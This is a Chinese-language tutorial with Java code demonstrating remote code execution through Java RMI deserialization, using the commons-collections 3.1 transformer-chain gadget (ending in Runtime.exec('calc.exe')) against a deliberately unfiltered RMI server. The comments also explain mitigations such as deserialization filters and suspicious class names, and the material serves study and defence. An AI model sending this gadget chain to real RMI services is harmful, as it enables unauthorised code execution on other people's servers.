1.背景
2.反序列化漏洞出现的环境
jdk1.7
commons-collections 3.1
<dependency>
<artifactId>commons-collections</artifactId>
<groupId>commons-collections</groupId>
<version>3.1</version>
</dependency>
3.JAVA代码
Remote接口
import java.rmi.Remote;
import java.rmi.RemoteException;
/**
* author: zhanggw
* 创建时间: 2021/12/17
*/
/**
 * Remote service contract published through the RMI registry.
 *
 * <p>The single operation takes an untyped {@code Object}. The RMI runtime
 * deserializes every argument before the method body runs, so the caller
 * decides which classes the server instantiates; a narrower parameter type
 * together with a server-side deserialization filter limits that exposure.
 */
public interface User extends Remote {

    /**
     * Performs the remote operation on the supplied argument.
     *
     * @param obj argument sent by the client; already deserialized by the RMI
     *            runtime when this method is entered
     * @throws RemoteException if the remote call fails
     */
    void work(Object obj) throws RemoteException;
}
实现类
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;
/**
* author: zhanggw
* 创建时间: 2021/12/17
*/
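/**
 * Server-side implementation of {@link User}, exported as a UnicastRemoteObject.
 *
 * <p>Security note: {@link #work(Object)} accepts an untyped {@code Object}.
 * The RMI runtime deserializes that argument while unmarshalling the call,
 * before this method is entered, so the class graph instantiated on the
 * server is chosen by the client rather than by this code. The mitigation
 * lives outside this class: a deserialization filter on the server JVM
 * ({@code jdk.serialFilter} / {@code ObjectInputFilter}, introduced in Java 9
 * and back-ported to later Java 7/8 update releases) plus a classpath that
 * does not ship known gadget classes.
 */
public class UserImpl extends UnicastRemoteObject implements User {

    /**
     * Exports this object on an anonymous port.
     *
     * @throws RemoteException if the export fails
     */
    protected UserImpl() throws RemoteException {
    }

    /**
     * Prints the argument followed by a marker line on standard output.
     *
     * @param obj argument supplied by the remote caller; may be {@code null}
     * @throws RemoteException never thrown here; declared by the interface
     */
    @Override
    public void work(Object obj) throws RemoteException {
        // String.valueOf tolerates a null argument, which obj.toString() would not.
        System.out.println(String.valueOf(obj));
        System.out.println("work被调用了");
    }
}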
Registry
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
/**
* author: zhanggw
* 创建时间: 2021/12/17
*/
/**
 * Starts an RMI registry on port 1099 and binds a {@link UserImpl} under the
 * name {@code "user"}.
 *
 * <p>The registry is created with the default socket factory, so it accepts
 * connections on whatever interfaces the JVM binds by default; nothing in this
 * class restricts callers or filters the classes the server will deserialize.
 */
public class RegistryServer {

    /** Registry port; 1099 is the RMI default. */
    private static final int PORT = 1099;

    /**
     * Entry point: exports the service and leaves the JVM running for
     * incoming calls.
     *
     * @param args ignored
     * @throws Exception if the object cannot be exported, the registry cannot
     *                   be created, or the binding fails
     */
    public static void main(String[] args) throws Exception {
        // Export first, then create the registry, then publish the stub.
        User service = new UserImpl();
        Registry registry = LocateRegistry.createRegistry(PORT);
        registry.rebind("user", service);
        System.out.println("rmi running....");
    }
}
rmi客户端
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.rmi.Naming;
import java.util.HashMap;
import java.util.Map;
/**
* author: zhanggw
* 创建时间: 2021/12/17
*/
/**
 * RMI client for the demonstration.
 *
 * <p>{@link #getPayload()} builds the well-known commons-collections 3.1
 * transformer chain and wraps it in an {@code AnnotationInvocationHandler}.
 * The object is never run on the client; it is simply passed as the
 * {@code Object} argument of {@link User#work(Object)}. The server's RMI
 * runtime deserializes it while unmarshalling the call, and that is where
 * the chain executes.
 *
 * <p>Defensive takeaways: the server never needs these classes for its own
 * work, so a deserialization filter that rejects them (or anything not on an
 * allow-list) stops the call before {@code work} is reached; later
 * commons-collections releases also refuse to deserialize these functor
 * classes by default. Class names worth alerting on in a serialized stream
 * include {@code ChainedTransformer}, {@code InvokerTransformer} and
 * {@code AnnotationInvocationHandler}.
 */
public class ClientDemo {

    /**
     * Looks up the remote {@link User} stub and invokes {@code work} with the payload.
     *
     * @param args ignored
     * @throws Exception on lookup or invocation failure
     */
    public static void main(String[] args) throws Exception{
        // Registry address is hard-coded to the demo server from the write-up.
        String url = "rmi://192.168.1.106:1099/user";
        User userClient = (User) Naming.lookup(url);
        // The argument is serialized here and deserialized by the server
        // before the server-side work() body runs.
        userClient.work(getPayload());
    }

    /**
     * Builds the serializable object whose deserialization triggers the
     * transformer chain.
     *
     * <p>Each transformer's output feeds the next one; the chain starts from
     * {@code Runtime.class} and ends in an {@code exec} call, so the
     * server-side effect is fixed entirely by this client-built object.
     *
     * @return an {@code AnnotationInvocationHandler} instance wrapping a
     *         {@code TransformedMap}
     * @throws Exception if reflection on the internal JDK class fails
     */
    public static Object getPayload() throws Exception{
        Transformer[] transformers = new Transformer[]{
            // Seed value for the chain.
            new ConstantTransformer(Runtime.class),
            // Each InvokerTransformer reflectively calls the named method on
            // the previous transformer's result.
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
        };
        Transformer transformerChain = new ChainedTransformer(transformers);
        Map<String, String> map = new HashMap<>();
        map.put("value", "sijidou");
        // No key transformer; the chain is installed as the value transformer
        // of the decorated map.
        Map transformedMap = TransformedMap.decorate(map, null, transformerChain);
        // JDK-internal class, not a public API; this construction relies on
        // the jdk1.7 behaviour listed in the write-up.
        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
        // The constructor is not public; reflection is needed to instantiate it.
        ctor.setAccessible(true);
        return ctor.newInstance(Retention.class, transformedMap);
    }
}
4.模拟
先运行RegistryServer类
再运行 ClientDemo。运行后，RegistryServer 所在电脑会弹出计算器。原理是：Java RMI 服务端在收到客户端发来的序列化对象后，对该对象进行反序列化时执行了被注入的恶意代码 Runtime.getRuntime().exec("calc")。这一步发生在 RMI 运行时拆解调用参数的阶段，早于 work 方法被调用，因此服务端的业务代码本身并没有"调用"恶意逻辑。